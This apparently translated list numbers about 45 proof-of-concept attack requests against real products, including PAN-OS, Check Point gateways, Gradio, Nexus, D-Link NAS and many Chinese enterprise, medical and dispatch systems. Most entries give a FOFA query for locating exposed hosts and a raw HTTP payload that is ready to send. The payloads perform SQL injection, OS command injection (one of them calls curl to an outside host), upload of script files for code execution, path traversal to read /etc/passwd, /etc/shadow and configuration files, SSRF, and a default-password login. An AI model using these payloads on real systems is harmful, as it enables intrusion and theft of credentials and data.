User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT high-definition license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
